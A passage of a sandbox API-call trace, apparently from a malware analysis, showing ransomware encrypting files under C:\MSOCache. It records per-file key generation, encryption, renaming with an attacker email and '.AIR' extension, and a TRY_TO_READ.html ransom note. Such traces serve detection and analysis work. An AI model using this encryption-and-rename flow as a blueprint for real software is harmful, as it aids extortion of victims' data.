hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0142.649] WriteFile (in: hFile=0x494, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0142.650] WriteFile (in: hFile=0x494, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0142.651] WriteFile (in: hFile=0x494, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0142.651] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x265400) returned 0x30d0020 [0142.651] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x265400) returned 0x3340020 [0142.652] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.652] ReadFile (in: hFile=0x494, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x265400, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x265400, lpOverlapped=0x0) returned 1 [0142.782] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x9721ce70, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9721ce70, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e0d8 [0142.782] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0142.782] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0142.782] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329018 [0142.782] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0142.782] GetLastError () returned 0x0 [0142.782] FindNextFileW (in: hFindFile=0x35e0d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x9721ce70, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9721ce70, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.782] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0142.782] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0142.782] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329018 [0142.783] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0142.783] GetLastError () returned 0x0 [0142.783] FindNextFileW (in: hFindFile=0x35e0d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee4bb7b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x3e7e1f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GrooveLR.cab", cAlternateFileName="")) returned 1 [0142.783] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0142.783] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0142.783] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329018 [0142.783] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0142.783] GetLastError () returned 0x0 [0142.783] FindNextFileW (in: hFindFile=0x35e0d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee3b15e0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x264400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GrooveMUI.msi", cAlternateFileName="GROOVE~1.MSI")) returned 1 [0142.783] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0142.783] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0142.783] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329018 [0142.783] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0142.783] GetLastError () returned 0x0 [0142.783] FindNextFileW (in: hFindFile=0x35e0d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x391, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GrooveMUI.xml", cAlternateFileName="GROOVE~1.XML")) returned 1 [0142.783] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0142.783] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0142.783] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329018 [0142.783] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0142.783] GetLastError () returned 0x0 [0142.783] FindNextFileW (in: hFindFile=0x35e0d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0142.783] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0142.783] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0142.783] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329018 [0142.783] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0142.783] GetLastError () returned 0x0 [0142.783] FindNextFileW (in: hFindFile=0x35e0d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9721ce70, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9721ce70, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9721ce70, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0142.783] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0142.783] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0142.783] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x329018 [0142.783] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0142.783] GetLastError () returned 0x0 [0142.783] FindNextFileW (in: hFindFile=0x35e0d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9721ce70, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9721ce70, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9721ce70, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0142.784] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x3856c8 [0142.784] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0142.784] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0142.784] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0142.784] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0142.784] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0142.785] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0142.785] GetProcessHeap () returned 0x2e0000 [0142.785] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x3a7410 [0142.785] lstrcpyW (in: lpString1=0x3a7410, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" [0142.785] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0142.785] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0142.788] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x498 [0142.788] GetProcessHeap () returned 0x2e0000 [0142.788] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0142.788] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1452) returned 1 [0142.789] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x5ac [0142.789] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0142.789] GetProcessHeap () returned 0x2e0000 [0142.789] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0142.789] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0142.789] WriteFile (in: hFile=0x498, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0142.792] WriteFile (in: hFile=0x498, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0142.792] WriteFile (in: hFile=0x498, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0142.792] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x5ac) returned 0x3a7410 [0142.793] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x5ac) returned 0x3a79c8 [0142.793] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.793] ReadFile (in: hFile=0x498, lpBuffer=0x3a7410, nNumberOfBytesToRead=0x5ac, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7410*, lpNumberOfBytesRead=0x2acf9c8*=0x5ac, lpOverlapped=0x0) returned 1 [0142.793] SetFilePointer (in: hFile=0x498, lDistanceToMove=-1452, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.793] WriteFile (in: hFile=0x498, lpBuffer=0x3a79c8*, nNumberOfBytesToWrite=0x5ac, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a79c8*, lpNumberOfBytesWritten=0x2acf9c8*=0x5ac, lpOverlapped=0x0) returned 1 [0142.793] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0142.793] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a79c8 | out: hHeap=0x2e0000) returned 1 [0142.793] CloseHandle (hObject=0x498) returned 1 [0142.794] GetProcessHeap () returned 0x2e0000 [0142.794] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0142.794] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0142.794] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0142.794] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3856c8 | out: hHeap=0x2e0000) returned 1 [0142.794] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385620 | out: hHeap=0x2e0000) returned 1 [0142.794] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385620 [0142.794] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0142.794] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0142.794] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0142.794] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0142.794] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", dwFileAttributes=0x80) returned 1 [0142.795] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 77 [0142.795] GetProcessHeap () returned 0x2e0000 [0142.795] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363a50 [0142.795] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" [0142.795] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0142.795] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0142.797] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x498 [0142.797] GetProcessHeap () returned 0x2e0000 [0142.797] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0142.797] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=913) returned 1 [0142.797] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x391 [0142.797] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0142.797] GetProcessHeap () returned 0x2e0000 [0142.798] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0142.798] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0142.798] WriteFile (in: hFile=0x498, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0142.799] WriteFile (in: hFile=0x498, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0142.799] WriteFile (in: hFile=0x498, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0142.800] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x391) returned 0x3a7410 [0142.800] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x391) returned 0x3a77b0 [0142.800] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.800] ReadFile (in: hFile=0x498, lpBuffer=0x3a7410, nNumberOfBytesToRead=0x391, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7410*, lpNumberOfBytesRead=0x2acf9c8*=0x391, lpOverlapped=0x0) returned 1 [0142.800] SetFilePointer (in: hFile=0x498, lDistanceToMove=-913, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.800] WriteFile (in: hFile=0x498, lpBuffer=0x3a77b0*, nNumberOfBytesToWrite=0x391, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a77b0*, lpNumberOfBytesWritten=0x2acf9c8*=0x391, lpOverlapped=0x0) returned 1 [0142.800] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0142.800] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a77b0 | out: hHeap=0x2e0000) returned 1 [0142.800] CloseHandle (hObject=0x498) returned 1 [0142.801] GetProcessHeap () returned 0x2e0000 [0142.801] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0142.801] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0142.801] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0142.801] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385620 | out: hHeap=0x2e0000) returned 1 [0142.801] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385578 | out: hHeap=0x2e0000) returned 1 [0142.801] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385578 [0142.801] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0142.801] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0142.801] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0142.801] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0142.801] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi", dwFileAttributes=0x80) returned 1 [0142.802] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 77 [0142.802] GetProcessHeap () returned 0x2e0000 [0142.802] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363a50 [0142.802] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" [0142.802] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0142.802] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0142.804] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x498 [0142.804] GetProcessHeap () returned 0x2e0000 [0142.804] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0142.804] GetFileSizeEx (in: hFile=0x498, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=2507776) returned 1 [0142.804] SetFilePointer (in: hFile=0x498, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x264400 [0142.804] CryptEncrypt (in: hKey=0x317a48, 